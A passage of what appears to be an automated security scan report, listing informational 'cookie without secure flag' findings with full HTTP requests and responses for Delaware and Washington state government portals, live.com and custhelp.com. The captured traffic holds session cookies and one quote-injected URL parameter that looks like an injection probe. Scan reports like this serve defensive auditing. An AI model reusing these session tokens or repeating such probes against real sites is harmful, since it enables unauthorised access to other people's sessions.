Referer: https://assist.dhss.delaware.gov/PGM/ASP/SC002.asp?hdn_SessionId=4371217393632042911203737&hdn_ApplicationNum=&hdn_Error=71602
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDACRDBQAB=NAHJLMKBNPNJMGNPPPBLBBFE; assist-persist=170663852.51305.0000

Response

HTTP/1.1 200 OK
Set-Cookie: assist-persist=170663852.51305.0000; expires=Sat, 30-Apr-2011 01:15:09 GMT; path=/
Content-Length: 192807
Content-Type: application/pdf
Last-Modified: Wed, 19 May 2010 20:32:37 GMT
Accept-Ranges: bytes
ETag: "96f09f6b92f7ca1:71c5"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 30 Apr 2011 00:42:44 GMT

%PDF-1.5%....
7 0 obj <</Linearized 1/L 192807/O 12/E 187432/N 1/T 192607/H [ 1176 235]>>endobj
xref
7 44
0000000016 00000 n
0000001411 00000 n
0000001546 00000 n
0000001176 0
...[SNIP]...

7.101. https://assist.dhss.delaware.gov/Style/ASSIST_SC_StyleNET.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://assist.dhss.delaware.gov
Path:   /Style/ASSIST_SC_StyleNET.css

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Style/ASSIST_SC_StyleNET.css HTTP/1.1
Host: assist.dhss.delaware.gov
Connection: keep-alive
Referer: https://assist.dhss.delaware.gov/PGM/ASP/SC001.asp
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: assist-persist=170663852.51305.0000; ASPSESSIONIDACRDBQAB=NAHJLMKBNPNJMGNPPPBLBBFE

Response

HTTP/1.1 200 OK
Set-Cookie: assist-persist=170663852.51305.0000; expires=Sat, 30-Apr-2011 01:08:31 GMT; path=/
Content-Length: 5482
Content-Type: text/css
Last-Modified: Mon, 07 Mar 2005 22:01:40 GMT
Accept-Ranges: bytes
ETag: "0fa773d6123c51:71c5"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 30 Apr 2011 00:36:06 GMT

BODY
{
BACKGROUND-POSITION: left top;
MARGIN-TOP: 0px;
PADDING-LEFT: 0px;
FONT-SIZE: 0pt;
MARGIN-LEFT: 0px;
PADDING-TOP: 0px;
FONT-FAMILY: Arial
}
.PageTableClass
...[SNIP]...

7.102. https://assist.dhss.delaware.gov/Style/Assist_Style_NET.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://assist.dhss.delaware.gov
Path:   /Style/Assist_Style_NET.css

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Style/Assist_Style_NET.css HTTP/1.1
Host: assist.dhss.delaware.gov
Connection: keep-alive
Referer: https://assist.dhss.delaware.gov/PGM/ASP/SC020.asp?hdn_Language=EN'&hdn_ProcessId=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDACRDBQAB=NAHJLMKBNPNJMGNPPPBLBBFE; assist-persist=170663852.51305.0000

Response

HTTP/1.1 200 OK
Set-Cookie: assist-persist=170663852.51305.0000; expires=Sat, 30-Apr-2011 01:48:09 GMT; path=/
Content-Length: 5357
Content-Type: text/css
Last-Modified: Mon, 07 Mar 2005 22:01:40 GMT
Accept-Ranges: bytes
ETag: "0fa773d6123c51:71c5"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 30 Apr 2011 01:15:44 GMT

BODY
{
BACKGROUND-POSITION: left top;
MARGIN-TOP: 0px;
PADDING-LEFT: 0px;
FONT-SIZE: 0pt;
MARGIN-LEFT: 0px;
PADDING-TOP: 0px;
FONT-FAMILY: Arial
}
.PageTableClass
...[SNIP]...

7.103. https://assist.dhss.delaware.gov/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://assist.dhss.delaware.gov
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
Host: assist.dhss.delaware.gov
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDACRDBQAB=NAHJLMKBNPNJMGNPPPBLBBFE; assist-persist=170663852.51305.0000

Response

HTTP/1.1 404 Not Found
Set-Cookie: assist-persist=170663852.51305.0000; expires=Sat, 30-Apr-2011 01:08:40 GMT; path=/
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 30 Apr 2011 00:36:14 GMT

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; cha
...[SNIP]...

7.104. https://assist.dhss.delaware.gov/images/Assist_header_people.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://assist.dhss.delaware.gov
Path:   /images/Assist_header_people.jpg

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/Assist_header_people.jpg HTTP/1.1
Host: assist.dhss.delaware.gov
Connection: keep-alive
Referer: https://assist.dhss.delaware.gov/PGM/ASP/SC001.asp
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDACRDBQAB=NAHJLMKBNPNJMGNPPPBLBBFE; assist-persist=170663852.51305.0000

Response

HTTP/1.1 200 OK
Set-Cookie: assist-persist=170663852.51305.0000; expires=Sat, 30-Apr-2011 01:08:35 GMT; path=/
Content-Length: 3360
Content-Type: image/jpeg
Last-Modified: Wed, 20 Apr 2005 20:31:34 GMT
Accept-Ranges: bytes
ETag: "0d76af1e745c51:71c5"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 30 Apr 2011 00:36:10 GMT

......JFIF.....`.`.....C...........        .
................... $.' ",#..(7),01444.'9=82<.342...C.            .....2!.!22222222222222222222222222222222222222222222222222......E...."..............................
...[SNIP]...

7.105. https://assist.dhss.delaware.gov/images/Assist_header_text.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://assist.dhss.delaware.gov
Path:   /images/Assist_header_text.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/Assist_header_text.gif HTTP/1.1
Host: assist.dhss.delaware.gov
Connection: keep-alive
Referer: https://assist.dhss.delaware.gov/PGM/ASP/SC001.asp
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDACRDBQAB=NAHJLMKBNPNJMGNPPPBLBBFE; assist-persist=170663852.51305.0000

Response

HTTP/1.1 200 OK
Set-Cookie: assist-persist=170663852.51305.0000; expires=Sat, 30-Apr-2011 01:08:35 GMT; path=/
Content-Length: 11588
Content-Type: image/gif
Last-Modified: Tue, 15 Mar 2005 21:38:48 GMT
Accept-Ranges: bytes
ETag: "064ff5ea729c51:71c5"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 30 Apr 2011 00:36:10 GMT

GIF89aX..........@@.......``..................................JJ.bb.HH..........vv.............YY.||....LL.VV.ll....RR.......zz....TT......................qq................\\.........................
...[SNIP]...

7.106. https://assist.dhss.delaware.gov/images/Assist_logo.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://assist.dhss.delaware.gov
Path:   /images/Assist_logo.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/Assist_logo.gif HTTP/1.1
Host: assist.dhss.delaware.gov
Connection: keep-alive
Referer: https://assist.dhss.delaware.gov/PGM/ASP/SC001.asp
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDACRDBQAB=NAHJLMKBNPNJMGNPPPBLBBFE; assist-persist=170663852.51305.0000

Response

HTTP/1.1 200 OK
Set-Cookie: assist-persist=170663852.51305.0000; expires=Sat, 30-Apr-2011 01:08:35 GMT; path=/
Content-Length: 795
Content-Type: image/gif
Last-Modified: Thu, 24 Feb 2005 19:46:10 GMT
Accept-Ranges: bytes
ETag: "02d117da91ac51:71c5"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 30 Apr 2011 00:36:10 GMT

GIF89a".!.......{...ss......{...BB.......!!....ZZ.......33.............RR.RR.kk.ff....99.{{.{{..........JJ.JJ.............)).))....ZZ.......33.......kk................99ihxihx........i.......    t...B...
...[SNIP]...

7.107. https://assist.dhss.delaware.gov/images/arrow_center.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://assist.dhss.delaware.gov
Path:   /images/arrow_center.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/arrow_center.gif HTTP/1.1
Host: assist.dhss.delaware.gov
Connection: keep-alive
Referer: https://assist.dhss.delaware.gov/PGM/ASP/SC002.asp?hdn_SessionId=4371217393632042911203737&hdn_ApplicationNum=
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDACRDBQAB=NAHJLMKBNPNJMGNPPPBLBBFE; assist-persist=170663852.51305.0000

Response

HTTP/1.1 200 OK
Set-Cookie: assist-persist=170663852.51305.0000; expires=Sat, 30-Apr-2011 01:10:14 GMT; path=/
Content-Length: 214
Content-Type: image/gif
Last-Modified: Tue, 25 Jan 2005 16:29:15 GMT
Accept-Ranges: bytes
ETag: "80bf622fb2c51:71c5"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 30 Apr 2011 00:37:48 GMT

GIF89a.. .....................................4fg.//..........**.............................................!.......,...... ...S...@2.O...Z..R..3?....[....0*.S....h:...4
.Z...v..z.....\..E...h...u...
...[SNIP]...

7.108. https://assist.dhss.delaware.gov/images/arrow_left.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://assist.dhss.delaware.gov
Path:   /images/arrow_left.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/arrow_left.gif HTTP/1.1
Host: assist.dhss.delaware.gov
Connection: keep-alive
Referer: https://assist.dhss.delaware.gov/PGM/ASP/SC002.asp?hdn_SessionId=4371217393632042911203737&hdn_ApplicationNum=
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDACRDBQAB=NAHJLMKBNPNJMGNPPPBLBBFE; assist-persist=170663852.51305.0000

Response

HTTP/1.1 200 OK
Set-Cookie: assist-persist=170663852.51305.0000; expires=Sat, 30-Apr-2011 01:10:13 GMT; path=/
Content-Length: 368
Content-Type: image/gif
Last-Modified: Tue, 25 Jan 2005 16:29:15 GMT
Accept-Ranges: bytes
ETag: "80bf622fb2c51:71c5"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 30 Apr 2011 00:37:48 GMT

GIF89a.. ..........4fg.................................}77.........x67.......++..........**..................!.......,...... .....ua.f.d1`BkN.dZ"....T.{..Z    u..(.....L..!F4( ....$<...+6..8....*.....m.N
...[SNIP]...

7.109. https://assist.dhss.delaware.gov/images/arrow_right.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://assist.dhss.delaware.gov
Path:   /images/arrow_right.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/arrow_right.gif HTTP/1.1
Host: assist.dhss.delaware.gov
Connection: keep-alive
Referer: https://assist.dhss.delaware.gov/PGM/ASP/SC002.asp?hdn_SessionId=4371217393632042911203737&hdn_ApplicationNum=
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDACRDBQAB=NAHJLMKBNPNJMGNPPPBLBBFE; assist-persist=170663852.51305.0000

Response

HTTP/1.1 200 OK
Set-Cookie: assist-persist=170663852.51305.0000; expires=Sat, 30-Apr-2011 01:10:14 GMT; path=/
Content-Length: 370
Content-Type: image/gif
Last-Modified: Tue, 25 Jan 2005 16:29:15 GMT
Accept-Ranges: bytes
ETag: "80bf622fb2c51:71c5"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 30 Apr 2011 00:37:48 GMT

GIF89a.. ..........4fg.................................}77.........x67.......++..........**..................!.......,...... ........0
.....\c{..5.X.K.......*.*.$/......2.Y2..&..*)#....)..F...b....1H
...[SNIP]...

7.110. https://assist.dhss.delaware.gov/images/corner_brown_color.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://assist.dhss.delaware.gov
Path:   /images/corner_brown_color.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/corner_brown_color.gif HTTP/1.1
Host: assist.dhss.delaware.gov
Connection: keep-alive
Referer: https://assist.dhss.delaware.gov/PGM/ASP/SC001.asp
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDACRDBQAB=NAHJLMKBNPNJMGNPPPBLBBFE; assist-persist=170663852.51305.0000

Response

HTTP/1.1 200 OK
Set-Cookie: assist-persist=170663852.51305.0000; expires=Sat, 30-Apr-2011 01:08:35 GMT; path=/
Content-Length: 72
Content-Type: image/gif
Last-Modified: Tue, 25 Jan 2005 16:29:16 GMT
Accept-Ranges: bytes
ETag: "056fb2fb2c51:71c5"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 30 Apr 2011 00:36:10 GMT

GIF89a..
........uu.......aa....**...!.......,......
...h....,...E.R..;

7.111. https://assist.dhss.delaware.gov/images/corner_teal_color.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://assist.dhss.delaware.gov
Path:   /images/corner_teal_color.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/corner_teal_color.gif HTTP/1.1
Host: assist.dhss.delaware.gov
Connection: keep-alive
Referer: https://assist.dhss.delaware.gov/PGM/ASP/SC001.asp
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDACRDBQAB=NAHJLMKBNPNJMGNPPPBLBBFE; assist-persist=170663852.51305.0000

Response

HTTP/1.1 200 OK
Set-Cookie: assist-persist=170663852.51305.0000; expires=Sat, 30-Apr-2011 01:08:36 GMT; path=/
Content-Length: 76
Content-Type: image/gif
Last-Modified: Tue, 25 Jan 2005 16:29:16 GMT
Accept-Ranges: bytes
ETag: "056fb2fb2c51:71c5"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 30 Apr 2011 00:36:10 GMT

GIF89a
.
............................!.......,....
.
....H...0J....<!F..0$.;

7.112. https://assist.dhss.delaware.gov/images/gold_rule_shim.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://assist.dhss.delaware.gov
Path:   /images/gold_rule_shim.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/gold_rule_shim.gif HTTP/1.1
Host: assist.dhss.delaware.gov
Connection: keep-alive
Referer: https://assist.dhss.delaware.gov/PGM/ASP/SC001.asp
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDACRDBQAB=NAHJLMKBNPNJMGNPPPBLBBFE; assist-persist=170663852.51305.0000

Response

HTTP/1.1 200 OK
Set-Cookie: assist-persist=170663852.51305.0000; expires=Sat, 30-Apr-2011 01:08:37 GMT; path=/
Content-Length: 43
Content-Type: image/gif
Last-Modified: Tue, 25 Jan 2005 16:29:17 GMT
Accept-Ranges: bytes
ETag: "80ec933fb2c51:71c5"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 30 Apr 2011 00:36:11 GMT

GIF89a........**...!.......,...........D..;

7.113. https://assist.dhss.delaware.gov/images/shim.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://assist.dhss.delaware.gov
Path:   /images/shim.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/shim.gif HTTP/1.1
Host: assist.dhss.delaware.gov
Connection: keep-alive
Referer: https://assist.dhss.delaware.gov/PGM/ASP/SC001.asp
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDACRDBQAB=NAHJLMKBNPNJMGNPPPBLBBFE; assist-persist=170663852.51305.0000

Response

HTTP/1.1 200 OK
Set-Cookie: assist-persist=170663852.51305.0000; expires=Sat, 30-Apr-2011 01:08:35 GMT; path=/
Content-Length: 43
Content-Type: image/gif
Last-Modified: Tue, 25 Jan 2005 16:29:17 GMT
Accept-Ranges: bytes
ETag: "80ec933fb2c51:71c5"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 30 Apr 2011 00:36:10 GMT

GIF89a.............!.......,...........D..;

7.114. https://favorites.live.com/quickadd.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://favorites.live.com
Path:   /quickadd.aspx

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /quickadd.aspx HTTP/1.1
Host: favorites.live.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Cache-Control: private
Content-Type: text/html; charset=utf-8
Location: https://office.live.com/sharefavorite.aspx%2f.SharedFavorites
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: xid=e359122d-0181-486e-a9ac-20d6233faf63&&BAYxxxxxxC636&158; domain=.live.com; path=/
Set-Cookie: xidseq=1; domain=.live.com; path=/
Set-Cookie: mktstate=S=1893731954&U=&E=&P=&B=en; domain=.live.com; path=/
Set-Cookie: mkt1=norm=en; domain=.live.com; path=/
Set-Cookie: mkt2=marketing=en-us; domain=skydrive.live.com; path=/
Set-Cookie: LD=; domain=.live.com; expires=Sat, 30-Apr-2011 10:40:34 GMT; path=/
X-Powered-By: ASP.NET
Date: Sat, 30 Apr 2011 12:20:34 GMT
Connection: close
Content-Length: 178

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="https://office.live.com/sharefavorite.aspx%2f.SharedFavorites">here</a>.</h2>
</body></html>

7.115. https://fortress.wa.gov/dol/dolprod/vehoffices/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://fortress.wa.gov
Path:   /dol/dolprod/vehoffices/

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /dol/dolprod/vehoffices/ HTTP/1.1
Host: fortress.wa.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
connection: close
content-type: text/html; charset=utf-8
date: Sat, 30 Apr 2011 12:20:40 GMT
p3p: CP="NON CUR OTPi OUR NOR UNI"
server: Microsoft-IIS/6.0
x-old-content-length: 34239
cache-control: private
x-powered-by: ASP.NET
x-aspnet-version: 2.0.50727
Set-Cookie: PD_STATEFUL_101c5ca4-0734-11dc-b4ac-000255ef2051=%2Fdol%2Fdolprod; Path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >

<head><title>
   WA Stat
...[SNIP]...

7.116. https://iris.custhelp.com/euf/assets/css/2009/jkmegamenu.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://iris.custhelp.com
Path:   /euf/assets/css/2009/jkmegamenu.css

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /euf/assets/css/2009/jkmegamenu.css HTTP/1.1
Host: iris.custhelp.com
Connection: keep-alive
Referer: https://iris.custhelp.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=162278755.1304039398.1.1.utmcsr=qriocity.com|utmccn=(referral)|utmcmd=referral|utmcct=/us/en/; __utma=162278755.897277051.1304039398.1304039398.1304039398.1; cp_session=aUxqbSmDTF9zJzhBJfb1F92LWC0Kf6M_chBVcBdbVsBdRhTE4dyBudDel3PBTMCcbt0G5M4_5w9JcZdV4VybHjLGNcGrrzNw5hbxYIGFEGupqUcu8pKx88tHF%7EKERiv3JVy5NkYDf%7Ew_LkB2Yurou0ES9QOGtwgf_w; TS2744aa=cc7e1e5c7e26af0307fed34a81cbc2ae25ed35bd7c0894804dbb5bc6

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 00:46:01 GMT
Last-Modified: Wed, 16 Mar 2011 01:07:55 GMT
Accept-Ranges: bytes
Cache-Control: max-age=900
Expires: Sat, 30 Apr 2011 01:01:01 GMT
RNT-Time: D=740 t=1304124361908316
RNT-Machine: 04
X-Cnection: close
Content-Type: text/css
Set-Cookie: TS8118ae=3d9fb9b0125b7347b5fb7b4d53cdd7e2de20e7210a4186634dbb5bc9; Max-Age=900; Path=/
Connection: Keep-Alive
Content-Length: 4494


#banner-area-menu {width:996px; height:17px; margin:0; padding: 2px 0 0 0; clear:both; background:#000033; position:relative;}


#banner-area-menu ul {padding:0; margin:0;}

#banner-area-menu u
...[SNIP]...

7.117. https://iris.custhelp.com/euf/assets/css/2009/va-styles.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://iris.custhelp.com
Path:   /euf/assets/css/2009/va-styles.css

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /euf/assets/css/2009/va-styles.css HTTP/1.1
Host: iris.custhelp.com
Connection: keep-alive
Referer: https://iris.custhelp.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=162278755.1304039398.1.1.utmcsr=qriocity.com|utmccn=(referral)|utmcmd=referral|utmcct=/us/en/; __utma=162278755.897277051.1304039398.1304039398.1304039398.1; cp_session=aUxqbSmDTF9zJzhBJfb1F92LWC0Kf6M_chBVcBdbVsBdRhTE4dyBudDel3PBTMCcbt0G5M4_5w9JcZdV4VybHjLGNcGrrzNw5hbxYIGFEGupqUcu8pKx88tHF%7EKERiv3JVy5NkYDf%7Ew_LkB2Yurou0ES9QOGtwgf_w; TS2744aa=cc7e1e5c7e26af0307fed34a81cbc2ae25ed35bd7c0894804dbb5bc6

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 00:46:01 GMT
Last-Modified: Wed, 16 Mar 2011 01:07:55 GMT
Accept-Ranges: bytes
Cache-Control: max-age=900
Expires: Sat, 30 Apr 2011 01:01:01 GMT
RNT-Time: D=590 t=1304124361911269
RNT-Machine: 04
X-Cnection: close
Content-Type: text/css
Set-Cookie: TS8118ae=f571b6d7caee8158775792d053afcdcee9d7bb51d989b78a4dbb5bc9; Max-Age=900; Path=/
Connection: Keep-Alive
Content-Length: 5606

.mainbody {
   background-color: #C0C0C0;
   color: #000000;
   font-family: Verdana, Geneva, sans-serif;
   font-size: 12px;
   margin: 0px;
   padding: 20px 0px 20px 0px;
   position: relative;
   text-a
...[SNIP]...

7.118. https://iris.custhelp.com/euf/assets/css/2009/va-user-styles.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://iris.custhelp.com
Path:   /euf/assets/css/2009/va-user-styles.css

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /euf/assets/css/2009/va-user-styles.css HTTP/1.1
Host: iris.custhelp.com
Connection: keep-alive
Referer: https://iris.custhelp.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
